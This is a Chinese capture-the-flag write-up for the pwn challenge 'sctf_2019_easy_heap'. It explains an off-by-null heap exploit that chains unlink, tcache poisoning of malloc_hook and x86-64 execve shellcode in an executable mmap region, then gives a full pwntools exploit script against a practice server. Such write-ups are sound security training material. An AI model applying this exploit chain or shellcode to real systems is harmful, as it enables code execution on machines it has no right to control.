sctf_2019_easy_heap

这道题用off by null解

例行检查，保护全开,不能利用got表，只能用hook的地址

程序运行前会执行一个函数，把buf的地址映射到某个0x1000大小的地址上，并返回这个地址，而且这个地址是可执行的，那么就可以用shellcode。

mmap()函数的权限参数指定了将要映射到进程地址空间的内存区域的访问权限。权限参数可以是以下值之一：

• PROT_EXEC：允许对内存映射区域进行执行访问。
• PROT_READ：允许对内存映射区域进行读取访问。
• PROT_WRITE：允许对内存映射区域进行写入访问。
• PROT_NONE：禁止对内存映射区域进行任何访问。

当权限参数的值为7时，实际上是将PROT_EXEC、PROT_READ和PROT_WRITE三个权限组合在一起，7=4+2+1。因此，权限参数为7表示将内存映射区域设置为可执行、读取和写入。在实际使用中，不建议将这些权限组合在一起，因为这可能会导致安全漏洞。通常建议只使用必要的权限来保护内存映射区域的安全性。

单独地把输入堆里的内容的函数放出来，双击一下，就是相当于read函数

按照题解里的流程，先创建一个0x410大小的堆，并接收其地址,这个地址存了malloc的堆的地址

add(0x410)
p.recvuntil('Address ')
chunk0_addr=int(p.recv(14),16)

然后再创建四个大小不同的堆

add(0x28)
add(0x18)
add(0x4f8)
add(0x10)

然后free掉堆0

dele(0)

然后edit堆2,也就是输入内容，构造下面的unlink

payload=p64(0)*2+p64(0x420+0x20+0x30)

在free堆3后，就会unlink合并，四个堆合并在一起

dele(3) free堆3

这里存堆0，堆3的指针都被清掉了。

再free堆1，堆2

然后又malloc两次,两个大小加起来刚好是0x970,会从原来的freechunk中拿。

add(0x440)
add(0x510)

然后编辑这两个堆的内容

payload=p64(0x410)+p64(0)+p64(0x30)+p64(mmap_addr+0x10)
fill(0,payload)
fill(1,'\x30')

编辑完后，这是堆0的

成功修改了0x30的tachebin指针成mmap+10的地址，0x5577338a86b0这是最后一个堆的地址，tachebin机制在freechunk里的最后一个堆指向main_arena+96这个地址。

这是堆1的，bin指针修改成了malloc_hook的地址。

原本的话指向main_arena+96这个地址，改掉最后的字节成0x30就是malloc_hook的地址

再malloc两次，把多余的freechunk拿掉

add(0x28)#2
add(0x18)#3

再add堆5，也就是在maap+10这个地址上放shellcode，手写shellcode是真的强好吧

add(0x28)#5
payload2 = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
fill(5,payload2 + '\n')

再add堆6，大小在0x10到0x18之间才能在0x20的tachebin(malloc_hook)里申请，这里我们放上st_addr+0x10的地址，也就是maap_addr+0x10的地址。

add(0x18)#6
edit(6,p64(st_addr + 0x10) + '\n')

这是堆5和堆6的地址，也就是mmap+10的地址和malloc_hook的地址

最后，再malloc一次，就会执行malloc_hook,而这个地址就会去执行mmap+0x10这个地址，这个地址放又shellcode，成功提权。

exp

from pwn import*
from LibcSearcher import *
p=remote("node4.buuoj.cn",29573)
#p=process("./sctf_2019_easy_heap")
context(arch='amd64')
context.log_level="debug"
libc=ELF('./libc-2.27.so')

def add(size):
    p.sendlineafter('>> ','1')
    p.sendlineafter('Size: ',str(size))
    
def fill(index,content):
    p.sendlineafter('>> ','3')
    p.sendlineafter('Index: ',str(index))
    p.sendlineafter('Content: ',content)

def dele(index):
    p.sendlineafter('>> ','2')
    p.sendlineafter('Index: ',str(index))

p.recvuntil('Mmap: ')
mmap_addr=int(p.recv(12),16)
print(hex(mmap_addr))

add(0x410) 
add(0x28)
add(0x18)
add(0x4f8)
add(0x10)

dele(0)

payload=p64(0)*2+p64(0x420+0x20+0x30)
fill(2,payload)

dele(3)
dele(1)
dele(2)

add(0x440)
add(0x510)

payload='a'*(0x410)+p64(0)+p64(0x30)+p64(mmap_addr+0x10)
fill(0,payload)
fill(1,'\x30')

add(0x28)#2
add(0x18)#3

add(0x28)#5
add(0x18)#6

payload2 = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

fill(5,payload2)
fill(6,p64(mmap_addr + 0x10))

add(0x10)
p.interactive()